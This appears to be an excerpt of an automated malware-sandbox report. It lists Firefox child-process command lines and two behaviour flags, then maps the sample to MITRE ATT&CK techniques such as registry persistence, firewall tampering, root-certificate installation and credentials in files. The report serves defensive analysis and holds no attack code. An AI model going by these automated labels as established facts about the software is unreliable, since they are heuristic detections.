"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3416.6.1462720340\736033159" -childID 5 -isForBrowser -prefsHandle 5296 -prefMapHandle 5300 -prefsLen 27987 -prefMapSize 235269 -jsInitHandle 1320 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ddbc384e-1c5c-4c50-9453-54720c8e5c75} 3416 "\\.\pipe\gecko-crash-server-pipe.3416" 5384 256ade1e858 tab
3⤵
PID:1676

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3416.7.496031691\1279168308" -childID 6 -isForBrowser -prefsHandle 5772 -prefMapHandle 5768 -prefsLen 28331 -prefMapSize 235269 -jsInitHandle 1320 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3fda9caf-8cc1-46d9-ac84-63eb61a822bc} 3416 "\\.\pipe\gecko-crash-server-pipe.3416" 5744 256b338bb58 tab
3⤵
PID:6876

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3416.8.1341011289\93661770" -childID 7 -isForBrowser -prefsHandle 5900 -prefMapHandle 5896 -prefsLen 28331 -prefMapSize 235269 -jsInitHandle 1320 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {018dc74b-8a94-413b-940f-47ee8f7732a3} 3416 "\\.\pipe\gecko-crash-server-pipe.3416" 5904 256b60e6658 tab
3⤵
PID:6996

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3416.9.692538702\814718857" -parentBuildID 20230214051806 -prefsHandle 6156 -prefMapHandle 6168 -prefsLen 28331 -prefMapSize 235269 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e2c9fadf-ee3c-47cc-b8be-598ed7f1963f} 3416 "\\.\pipe\gecko-crash-server-pipe.3416" 6172 256b5867258 rdd
3⤵
PID:4104

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3416.10.552901380\520815269" -parentBuildID 20230214051806 -sandboxingKind 1 -prefsHandle 6148 -prefMapHandle 6160 -prefsLen 28331 -prefMapSize 235269 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {89b99432-a7bf-44a4-8627-93ca4518209c} 3416 "\\.\pipe\gecko-crash-server-pipe.3416" 6188 256b5f2b858 utility
3⤵
PID:3032

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3416.11.2091226438\200789579" -childID 8 -isForBrowser -prefsHandle 6628 -prefMapHandle 6624 -prefsLen 28331 -prefMapSize 235269 -jsInitHandle 1320 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {98fe2c25-dc79-431b-8444-a60b7fc246cc} 3416 "\\.\pipe\gecko-crash-server-pipe.3416" 6640 256b60e6058 tab
3⤵
PID:7112

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3416.12.567240631\706516345" -childID 9 -isForBrowser -prefsHandle 5404 -prefMapHandle 3300 -prefsLen 28331 -prefMapSize 235269 -jsInitHandle 1320 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c967d57a-195f-43d6-8282-c587fa5209f7} 3416 "\\.\pipe\gecko-crash-server-pipe.3416" 7032 256b3388e58 tab
3⤵
PID:2696

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3416.13.181154324\630068200" -childID 10 -isForBrowser -prefsHandle 3024 -prefMapHandle 7004 -prefsLen 28331 -prefMapSize 235269 -jsInitHandle 1320 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e0429e5c-d2e2-45a5-858e-1b27c3cddd9f} 3416 "\\.\pipe\gecko-crash-server-pipe.3416" 6764 256b52be558 tab
3⤵
PID:6648

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3416.14.537375714\2063290881" -parentBuildID 20230214051806 -sandboxingKind 0 -prefsHandle 10980 -prefMapHandle 10976 -prefsLen 28467 -prefMapSize 235269 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f44d25ad-df63-416f-83f4-a82dca2acfd5} 3416 "\\.\pipe\gecko-crash-server-pipe.3416" 10992 256b5d85958 utility
3⤵
PID:6304

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004E8
1⤵
PID:3696

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:7468

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
2⤵
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:6452

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6452.0.941504300\820010394" -parentBuildID 20230214051806 -prefsHandle 1648 -prefMapHandle 1640 -prefsLen 22859 -prefMapSize 235356 -appDir "C:\Program Files\Mozilla Firefox\browser" - {13b1723a-8e1f-4f4d-9b3c-930d4f53d110} 6452 "\\.\pipe\gecko-crash-server-pipe.6452" 1736 22cf4e2c058 gpu
3⤵
PID:4688

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6452.1.284014426\804776883" -parentBuildID 20230214051806 -prefsHandle 2228 -prefMapHandle 2216 -prefsLen 22859 -prefMapSize 235356 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ffe4b33e-ec97-4228-b4ed-58f4ab7766aa} 6452 "\\.\pipe\gecko-crash-server-pipe.6452" 2240 22ce8d89958 socket
3⤵
PID:6620

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6452.2.2009299880\369624296" -childID 1 -isForBrowser -prefsHandle 3288 -prefMapHandle 3284 -prefsLen 23320 -prefMapSize 235356 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9565de2c-3661-4a47-9383-e837b0185c74} 6452 "\\.\pipe\gecko-crash-server-pipe.6452" 3336 22cf8d77358 tab
3⤵
PID:4692

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6452.3.428200839\1143852710" -childID 2 -isForBrowser -prefsHandle 3660 -prefMapHandle 3656 -prefsLen 28629 -prefMapSize 235356 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {62ea12be-e15c-401a-9286-debd056ed273} 6452 "\\.\pipe\gecko-crash-server-pipe.6452" 3672 22ce8d7ae58 tab
3⤵
PID:8088

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6452.4.917576500\1847114177" -childID 3 -isForBrowser -prefsHandle 4740 -prefMapHandle 4736 -prefsLen 28629 -prefMapSize 235356 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cb9edb51-8a1a-4fe0-8d09-b5936d343edc} 6452 "\\.\pipe\gecko-crash-server-pipe.6452" 4800 22ce8d81058 tab
3⤵
PID:7908

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6452.5.2030836244\1440688552" -childID 4 -isForBrowser -prefsHandle 5032 -prefMapHandle 5068 -prefsLen 28629 -prefMapSize 235356 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {48bb9f7e-1b5f-49eb-99ce-1a7c8da4cd4f} 6452 "\\.\pipe\gecko-crash-server-pipe.6452" 5012 22cfceb4558 tab
3⤵
PID:6872

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6452.6.1028891000\1915869803" -childID 5 -isForBrowser -prefsHandle 4740 -prefMapHandle 5268 -prefsLen 28629 -prefMapSize 235356 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9c4d0975-9c78-4d26-802d-999c7ba2d039} 6452 "\\.\pipe\gecko-crash-server-pipe.6452" 5280 22cfddd8558 tab
3⤵
PID:2024

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

Defense Evasion

Modify Registry

Virtualization/Sandbox Evasion

T1497

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

Virtualization/Sandbox Evasion

T1497

System Information Discovery